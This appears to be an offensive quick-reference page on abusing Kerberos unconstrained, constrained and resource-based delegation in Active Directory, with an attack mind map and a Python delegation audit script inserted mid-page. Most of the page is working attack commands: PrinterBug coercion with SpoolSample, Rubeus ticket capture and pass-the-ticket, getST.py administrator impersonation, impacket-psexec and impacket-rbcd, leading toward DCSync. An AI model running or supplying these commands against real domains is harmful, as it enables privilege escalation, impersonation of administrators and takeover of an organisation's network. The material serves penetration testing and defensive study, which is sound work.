Delegation Attack Paths

Kerberos delegation abuse

Constrained & Unconstrained Delegation

Interactive Mind Map

graph TD
    A[Find Delegation] --> B{Delegation Type}
    B --> C[Unconstrained]
    B --> D[Constrained]
    B --> E[Resource-Based RBCD]
    C --> F[Coerce DC Auth]
    F --> G[PrinterBug/PetitPotam]
    G --> H[Capture DC TGT]
    H --> I[DCSync]
    D --> J[Request Ticket as Admin]
    J --> K[getST.py impersonate]
    K --> L[Access Target Service]
    E --> M[Need Write on Target]
    M --> N[Add RBCD Delegation]
    N --> K

Quick Reference

Find Delegation

# Unconstrained
Get-DomainComputer -Unconstrained # Find unconstrained delegation
# Constrained
Get-DomainUser -TrustedToAuth # Find constrained delegation (users)
Get-DomainComputer -TrustedToAuth # Find constrained delegation (computers)
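
The same inventory from the defender's side, as an added example that is not part of the original page: it classifies accounts into the three delegation types of the map from exported AD attributes and lists privileged accounts that are not marked as non-delegatable. The account names, SPN, records and function names are constructed for illustration.

```python
# userAccountControl bit values as documented by Microsoft.
SERVER_TRUST_ACCOUNT = 0x2000                # domain controller
WORKSTATION_TRUST_ACCOUNT = 0x1000           # member computer
NORMAL_ACCOUNT = 0x200                       # user / service account
TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
NOT_DELEGATED = 0x100000                     # sensitive, cannot be delegated
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition

# Constructed sample records (hypothetical names, not from a real directory).
SAMPLE = [
    {"sAMAccountName": "DC01$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "WEB01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "svc_sql", "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.corp.example"]},
    {"sAMAccountName": "FS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": "<security descriptor placeholder>"},
    {"sAMAccountName": "administrator", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "da_alice", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED},
]

def classify(rec):
    """Return the delegation findings for one account record."""
    uac = int(rec.get("userAccountControl", 0))
    findings = []
    # Domain controllers carry this flag by default, so they are not reported.
    if (uac & TRUSTED_FOR_DELEGATION) and not (uac & SERVER_TRUST_ACCOUNT):
        findings.append("unconstrained")
    spns = rec.get("msDS-AllowedToDelegateTo") or []
    if spns:
        kind = "constrained+protocol-transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "constrained"
        findings.append(f"{kind} -> {', '.join(spns)}")
    # A populated attribute means other principals may delegate to this account.
    if rec.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("rbcd-configured")
    return findings

def audit(records):
    """Map account name -> findings, omitting accounts with none."""
    return {r["sAMAccountName"]: f for r in records if (f := classify(r))}

def missing_not_delegated(records, privileged):
    """Privileged accounts that delegation can still impersonate."""
    return sorted(r["sAMAccountName"] for r in records
                  if r["sAMAccountName"] in privileged
                  and not (int(r.get("userAccountControl", 0)) & NOT_DELEGATED))

if __name__ == "__main__":
    print(audit(SAMPLE))
    print("no NOT_DELEGATED:", missing_not_delegated(SAMPLE, {"administrator", "da_alice"}))
```

Membership in the Protected Users group also blocks delegation of an account, so check group membership before reporting an account from the second function.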

Unconstrained Delegation

# Coerce auth (PrinterBug)
SpoolSample.exe DC attacker-machine # Trigger auth from DC
# Capture TGT with Rubeus
Rubeus.exe monitor /interval:1 # Monitor for TGTs
# Use DC TGT
Rubeus.exe ptt /ticket:base64ticket # Pass-the-Ticket

Constrained Delegation

# Request service ticket
getST.py -spn cifs/target -impersonate administrator domain/user:pass # Abuse constrained delegation
export KRB5CCNAME=admin.ccache # Set ticket
impacket-psexec -k -no-pass target # Auth with ticket

Resource-Based (RBCD)

# Need GenericWrite on target
impacket-rbcd domain/user:pass -action write -delegate-to TARGET$ -delegate-from YOURPC$ # Configure RBCD
getST.py -spn cifs/target -impersonate admin domain/yourpc$:pass # Abuse RBCD to impersonate admin